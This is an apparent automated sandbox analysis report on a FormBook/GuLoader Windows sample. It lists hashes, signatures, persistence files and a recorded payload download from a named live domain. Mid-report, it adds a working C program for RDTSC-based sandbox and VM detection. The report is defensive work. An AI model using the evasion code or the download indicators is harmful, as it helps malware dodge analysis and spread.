Windows Analysis Report
Ntwph4urc1.exe

Overview

General Information

Sample name: Ntwph4urc1.exe (renamed because original name is a hash value)
Original sample name: ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
Analysis ID: 1588721
MD5: c57da1bb37a79e6f05722518dbadb3ce
SHA1: c7d63301754e2a380d29a9170654670e4beeb1ad
SHA256: ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
Tags: exe, user-adrian__luca

Detection

FormBook, GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Ntwph4urc1.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
    • Ntwph4urc1.exe (PID: 2224 cmdline: "C:\Users\user\Desktop\Ntwph4urc1.exe" MD5: C57DA1BB37A79E6F05722518DBADB3CE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T04:42:16.439704+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49986 | 122.201.127.17 | 443 | TCP

AV Detection

Source: Ntwph4urc1.exe | ReversingLabs: Detection: 73%
Source: Ntwph4urc1.exe | Virustotal: Detection: 75%
Source: Yara match | File source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Ntwph4urc1.exe | Joe Sandbox ML: detected
Source: Ntwph4urc1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 122.201.127.17:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: Ntwph4urc1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb | source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP | source: Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP | source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_00402902 FindFirstFileW,0_2_00402902
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49986 -> 122.201.127.17:443
Source: global traffic | HTTP traffic detected:
  GET /yzSJO174.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: babalharra.com.au
  Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: babalharra.com.au
Source: Ntwph4urc1.exe, 00000000.00000000.2173648853.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000006.00000000.2688245914.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/
Source: Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/ES
Source: Ntwph4urc1.exe, 00000006.00000003.3051661184.0000000006847000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093485249.0000000006849000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051505446.0000000006847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/yzSJO174.bin
Source: Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://babalharra.com.au/yzSJO174.binK
Source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown | Network traffic detected: HTTP traffic on port 49986 -> 443
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405595

E-Banking Fraud

Source: Yara match | File source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369835C0 NtCreateMutant,LdrInitializeThunk,6_2_369835C0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_36982DF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36983090 NtSetValueKey,6_2_36983090
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36983010 NtOpenDirectoryObject,6_2_36983010
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36983D10 NtOpenProcessToken,6_2_36983D10
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36983D70 NtOpenThread,6_2_36983D70
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369839B0 NtGetContextThread,6_2_369839B0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36984650 NtSuspendThread,6_2_36984650
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36984340 NtSetContextThread,6_2_36984340
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982E80 NtReadVirtualMemory,6_2_36982E80
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982EA0 NtAdjustPrivilegesToken,6_2_36982EA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982EE0 NtQueueApcThread,6_2_36982EE0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982E30 NtWriteVirtualMemory,6_2_36982E30
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982F90 NtProtectVirtualMemory,6_2_36982F90
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982FB0 NtResumeThread,6_2_36982FB0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982FA0 NtQuerySection,6_2_36982FA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982FE0 NtCreateFile,6_2_36982FE0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982F30 NtCreateSection,6_2_36982F30
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982F60 NtCreateProcessEx,6_2_36982F60
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982CA0 NtQueryInformationToken,6_2_36982CA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982CC0 NtQueryVirtualMemory,6_2_36982CC0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982CF0 NtOpenProcess,6_2_36982CF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982C00 NtQueryInformationProcess,6_2_36982C00
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982C70 NtFreeVirtualMemory,6_2_36982C70
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982C60 NtCreateKey,6_2_36982C60
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982DB0 NtEnumerateKey,6_2_36982DB0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982DD0 NtDelayExecution,6_2_36982DD0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982D10 NtMapViewOfSection,6_2_36982D10
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982D00 NtSetInformationFile,6_2_36982D00
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982D30 NtUnmapViewOfSection,6_2_36982D30
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982AB0 NtWaitForSingleObject,6_2_36982AB0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982AD0 NtReadFile,6_2_36982AD0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982AF0 NtWriteFile,6_2_36982AF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982B80 NtQueryInformationFile,6_2_36982B80
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982BA0 NtEnumerateValueKey,6_2_36982BA0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982BF0 NtAllocateVirtualMemory,6_2_36982BF0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982BE0 NtQueryValueKey,6_2_36982BE0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36982B60 NtClose,6_2_36982B60
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 3693B970 appears 280 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 36985130 appears 58 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 369CF290 appears 105 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 36997E54 appears 111 times
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: String function: 369BEA12 appears 86 times
Source: Ntwph4urc1.exe, 00000006.00000003.3053401808.000000003688F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
Source: Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000366D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
Source: Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036BE1000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Ntwph4urc1.exe
Source: classification engine | Classification label: mal80.troj.evad.winEXE@3/5@1/1
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_00404835 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404835
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Local\Temp\nsx6CF7.tmp
Source: Ntwph4urc1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File read: C:\Users\user\Desktop\Ntwph4urc1.exe
Source: unknown | Process created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Process created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Ntwph4urc1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara match | File source: 00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_73F51B5F GlobalAlloc, lstrcpyW, lstrcpyW, GlobalFree, GlobalFree, GlobalFree, GlobalFree, GlobalFree, GlobalFree, lstrcpyW, GetModuleHandleW, LoadLibraryW, GetProcAddress, lstrlenW
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369409AD push ecx; mov dword ptr [esp], ecx (6_2_369409B6)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created (dropped PE): C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Vaabenstyringssystemernes.War
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.biv
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.sti
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | API/Special instruction interceptor: Address: 58B806C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | API/Special instruction interceptor: Address: 29A806C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | RDTSC instruction interceptor: first address 587AAC2, second address 587AAC2, instructions:
          0x00000000 rdtsc
          0x00000002 cmp ebx, ecx
          0x00000004 jc 00007FF5C0BDF755h
          0x00000006 cmp ah, FFFFFFE4h
          0x00000009 cmp ch, ah
          0x0000000b inc ebp
          0x0000000c inc ebx
          0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | RDTSC instruction interceptor: first address 296AAC2, second address 296AAC2, instructions:
          0x00000000 rdtsc
          0x00000002 cmp ebx, ecx
          0x00000004 jc 00007FF5C0B1A5A5h
          0x00000006 cmp ah, FFFFFFE4h
          0x00000009 cmp ch, ah
          0x0000000b inc ebp
          0x0000000c inc ebx
          0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A116A6 rdtsc
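The two rdtsc sites listed above bracket a handful of register-only filler instructions (cmp/inc) and compare the cycle delta between the reads: on bare metal the pair costs a few dozen ticks, while a monitor that traps or emulates rdtsc, as the interceptor that produced this evidence does, inflates the delta by orders of magnitude. The C program below is an added example, not GuLoader code and not anything taken from the report: it performs the same measurement, applies a threshold the way the loader's decision does, and shows the minimum-of-N sampling an analyst uses to obtain a stable baseline. The filler body and the 2000-tick threshold are assumptions chosen for illustration; the real loader hard-codes its own.

```c
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Read the time-stamp counter. On x86 this is the same RDTSC the sample
 * executes; on other architectures fall back to a monotonic nanosecond
 * clock so the program still compiles and the decision logic can run. */
static uint64_t read_tsc(void)
{
#if defined(__x86_64__) || defined(__i386__)
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* One measurement: rdtsc, a few register-only operations standing in for
 * the sample's cmp/inc filler (assumed, not the sample's bytes), rdtsc
 * again. Under RDTSC interception each read traps into the monitor, so the
 * delta grows far beyond what the filler costs. */
uint64_t tsc_delta_probe(void)
{
    volatile uint32_t a = 0x41, b = 0x42;   /* volatile keeps the filler in place */
    uint64_t t0 = read_tsc();
    a += (b ^ a);
    b += a;
    uint64_t t1 = read_tsc();
    (void)a; (void)b;
    return t1 - t0;
}

/* Interrupts and context switches add noise; the minimum over N probes is
 * the closest approximation of the undisturbed cost of the pair, which is
 * what an analyst compares against a hypervisor's inflated figure. */
uint64_t min_tsc_delta(unsigned n)
{
    uint64_t best = UINT64_MAX;
    for (unsigned i = 0; i < n; i++) {
        uint64_t d = tsc_delta_probe();
        if (d < best)
            best = d;
    }
    return best;
}

/* The decision the loader makes: 1 when the delta exceeds the threshold
 * (treat the host as instrumented), 0 otherwise. */
int looks_instrumented(uint64_t delta, uint64_t threshold)
{
    return delta > threshold ? 1 : 0;
}

int main(void)
{
    const uint64_t threshold = 2000;   /* assumed cut-off in TSC ticks */
    uint64_t d = min_tsc_delta(256);
    printf("min rdtsc delta over 256 probes: %llu ticks -> %s\n",
           (unsigned long long)d,
           looks_instrumented(d, threshold) ? "instrumented" : "native");
    return 0;
}
```

Because the check is a plain comparison on a counter the monitor controls, the usual counter-measure is not to hide rdtsc but to return values consistent with native execution, which is what makes a sandbox's own RDTSC instrumentation visible in a report like this one.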
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | API coverage: 0.1 %
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe TID: 4340 | Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_0040674C FindFirstFileW, FindClose
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_00405B00 GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_00402902 FindFirstFileW
